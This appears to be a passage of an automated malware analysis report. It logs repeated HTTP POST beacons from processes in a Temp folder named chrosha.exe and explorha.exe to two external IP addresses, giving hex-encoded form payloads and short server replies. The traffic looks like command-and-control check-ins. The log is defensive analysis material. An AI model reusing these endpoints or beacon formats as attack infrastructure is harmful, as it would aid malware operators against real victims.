                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
967 | 192.168.2.5 | 50818 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:25.119321108 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:25.375372887 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
968 | 192.168.2.5 | 50819 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:25.495364904 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:25.743014097 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
969 | 192.168.2.5 | 50821 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:25.743024111 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:25.990389109 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
970 | 192.168.2.5 | 50822 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:25.994538069 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:26.246619940 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
971 | 192.168.2.5 | 50823 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:26.347805977 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:26.591861963 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
972 | 192.168.2.5 | 50824 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:26.603172064 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:26.851655960 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
973 | 192.168.2.5 | 50825 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:26.839293003 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:27.088978052 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
974 | 192.168.2.5 | 50826 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:27.104207039 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:27.356904030 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
975 | 192.168.2.5 | 50827 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:27.209022999 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:27.452063084 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
976 | 192.168.2.5 | 50828 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:27.704478979 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:27.959950924 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
977 | 192.168.2.5 | 50829 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:27.707828999 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:27.952761889 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
978 | 192.168.2.5 | 50830 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:28.201654911 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:28.451560020 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
979 | 192.168.2.5 | 50831 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:28.318681955 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:28.563512087 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
980         192.168.2.5  50832        193.233.132.56   80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:34:28.798957109 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:34:29.040250063 CEST  219  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:34:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
981         192.168.2.5  50833        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:34:28.807218075 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:29.054137945 CEST  196  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:34:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
982         192.168.2.5  50834        193.233.132.56   80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:34:29.297972918 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:29.554735899 CEST  196  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:34:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
983         192.168.2.5  50835        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:34:29.417376995 CEST  155  OUT  POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:34:29.664119005 CEST  197  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:34:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
984         192.168.2.5  50837        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:34:29.913275003 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:30.163511992 CEST  196  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:34:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      985192.168.2.550836193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:29.920051098 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:30.170856953 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
